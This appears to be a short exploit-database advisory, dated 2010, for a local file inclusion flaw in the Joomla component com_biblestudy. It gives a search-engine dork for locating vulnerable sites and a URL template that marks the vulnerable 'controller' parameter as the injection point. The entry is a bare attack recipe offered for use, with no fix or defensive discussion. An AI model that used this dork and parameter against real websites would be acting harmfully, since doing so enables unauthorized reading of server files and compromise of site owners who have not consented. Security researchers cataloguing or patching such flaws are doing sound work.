id: 10597
date: 01/03/2010
title: Joomla Component com_biblestudy LFI Vulnerability
author: Fl0riX
cves: 

=================================================
Joomla Component com_biblestudy LFI Vulnerability
=================================================

@~~=======================================~~@
@~~=Script   : Joomla Component com_biblestudy
 
@~~=Author   : FL0RiX
 
@~~=Bug Type : Local File Inlusion
 
@~~=Dork : inurl:"com_biblestudy"
 
@~~=======================================~~@
 
@~~=Vuln
 
: http://server/ [Yol] /index.php?option=com_biblestudy&id=1&view=studieslist&controller= [-LFI-]



#  0day.today [2023-03-25]  #